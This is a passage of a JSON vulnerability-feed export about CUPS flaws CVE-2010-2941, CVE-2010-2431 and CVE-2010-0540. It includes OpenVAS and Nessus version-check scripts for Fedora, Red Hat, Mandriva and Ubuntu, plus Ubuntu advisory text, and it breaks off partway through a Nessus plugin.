value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-17641\");\n script_cve_id(\"CVE-2010-2941\");\n script_name(\"Fedora Update for cups FEDORA-2010-17641\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.4~11.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T11:48:56", "bulletinFamily": "scanner", "description": "Check for the Version of cups", "modified": "2017-12-13T00:00:00", "published": "2010-11-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870352", "id": "OPENVAS:870352", "title": "RedHat Update for cups RHSA-2010:0811-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for cups RHSA-2010:0811-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Common UNIX Printing System (CUPS) provides a portable printing layer\n for UNIX operating systems.\n\n A use-after-free flaw was found in the way the CUPS server parsed Internet\n Printing Protocol (IPP) packets. A malicious user able to send IPP requests\n to the CUPS server could use this flaw to crash the CUPS server or,\n potentially, execute arbitrary code with the privileges of the CUPS server.\n (CVE-2010-2941)\n\n A possible privilege escalation flaw was found in CUPS. An unprivileged\n process running as the "lp" user (such as a compromised external filter\n program spawned by the CUPS server) could trick the CUPS server into\n overwriting arbitrary files as the root user. (CVE-2010-2431)\n\n Red Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\n reporting the CVE-2010-2941 issue.\n\n Users of cups are advised to upgrade to these updated packages, which\n contain backported patches to correct these issues. After installing this\n update, the cupsd daemon will be restarted automatically.\";\n\ntag_affected = \"cups on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-October/msg00034.html\");\n script_id(870352);\n script_version(\"$Revision: 8092 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-13 07:31:16 +0100 (Wed, 13 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-04 12:09:38 +0100 (Thu, 04 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2010:0811-01\");\n script_cve_id(\"CVE-2010-2431\", \"CVE-2010-2941\");\n script_name(\"RedHat Update for cups RHSA-2010:0811-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.3.7~18.el5_5.8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.3.7~18.el5_5.8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.3.7~18.el5_5.8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.3.7~18.el5_5.8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.3.7~18.el5_5.8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:55", "bulletinFamily": "scanner", "description": "Check for the Version of cups", "modified": "2017-12-22T00:00:00", "published": "2010-11-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831255", "id": "OPENVAS:1361412562310831255", "title": "Mandriva Update for cups MDVSA-2010:233 (cups)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for cups MDVSA-2010:233 (cups)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were discovered and corrected in cups:\n\n Cross-site request forgery (CSRF) vulnerability in the web interface\n in CUPS, allows remote attackers to hijack the authentication of\n administrators for requests that change settings (CVE-2010-0540).\n \n ipp.c in cupsd in CUPS 1.4.4 and earlier does not properly allocate\n memory for attribute values with invalid string data types, which\n allows remote attackers to cause a denial of service (use-after-free\n and application crash) or possibly execute arbitrary code via a\n crafted IPP request (CVE-2010-2941).\n \n The updated packages have been patched to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"cups on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-11/msg00027.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831255\");\n script_version(\"$Revision: 8228 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 08:29:52 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-23 15:30:07 +0100 (Tue, 23 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2010:233\");\n script_cve_id(\"CVE-2010-0540\", \"CVE-2010-2941\");\n script_name(\"Mandriva Update for cups MDVSA-2010:233 (cups)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", rpm:\"lib64cups2-devel~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:00", "bulletinFamily": "unix", "description": "Emmanuel Bouillon discovered that CUPS did not properly handle certain Internet Printing Protocol (IPP) packets. A remote attacker could use this flaw to cause a denial of service or possibly execute arbitrary code. In the default installation in Ubuntu 8.04 LTS and later, attackers would be isolated by the CUPS AppArmor profile.", "modified": "2010-11-04T00:00:00", "published": "2010-11-04T00:00:00", "id": "USN-1012-1", "href": "https://usn.ubuntu.com/1012-1/", "title": "CUPS vulnerability", "type": "ubuntu", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:11:18", "bulletinFamily": "scanner", "description": "Emmanuel Bouillon discovered that CUPS did not properly handle certain\nInternet Printing Protocol (IPP) packets. A remote attacker could use\nthis flaw to cause a denial of service or possibly execute arbitrary\ncode. In the default installation in Ubuntu 8.04 LTS and later,\nattackers would be isolated by the CUPS AppArmor profile.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2018-12-01T00:00:00", "published": "2010-11-05T00:00:00", "id": "UBUNTU_USN-1012-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50490", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 9.10 / 10.04 LTS / 10.10 : cups, cupsys vulnerability (USN-1012-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1012-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50490);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/12/01 13:19:06\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n script_xref(name:\"USN\", value:\"1012-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 9.10 / 10.04 LTS / 10.10 : cups, cupsys vulnerability (USN-1012-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Emmanuel Bouillon discovered that CUPS did not properly handle certain\nInternet Printing Protocol (IPP) packets. A remote attacker could use\nthis flaw to cause a denial of service or possibly execute arbitrary\ncode. In the default installation in Ubuntu 8.04 LTS and later,\nattackers would be isolated by the CUPS AppArmor profile.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1012-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups-bsd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups-ppdc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsddk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys-bsd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcups2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcups2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupscgi1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupscgi1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsdriver1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsdriver1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsimage2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsimage2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsmime1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsmime1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsppdc1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsppdc1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsys2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsys2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsys2-gnutls10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|9\\.10|10\\.04|10\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 9.10 / 10.04 / 10.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"cupsys\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"cupsys-bsd\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"cupsys-client\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsimage2\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsys2\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsys2-dev\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsys2-gnutls10\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"cupsys\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"cupsys-bsd\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"cupsys-client\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"cupsys-common\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libcupsimage2\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libcupsys2\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libcupsys2-dev\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups-bsd\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups-client\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups-common\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups-dbg\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups-ppdc\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cupsddk\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cupsys\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cupsys-bsd\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cupsys-client\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cupsys-common\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cupsys-dbg\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcups2\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcups2-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupscgi1\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupscgi1-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsdriver1\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsdriver1-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsimage2\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsmime1\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsmime1-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsppdc1\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsppdc1-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups-bsd\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups-client\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups-common\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups-dbg\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups-ppdc\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsddk\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsys\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsys-bsd\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsys-client\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsys-common\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsys-dbg\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcups2\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcups2-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupscgi1\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupscgi1-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsdriver1\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsdriver1-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsimage2\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsmime1\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsmime1-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsppdc1\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsppdc1-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cups\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cups-bsd\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cups-client\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cups-common\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cups-dbg\", 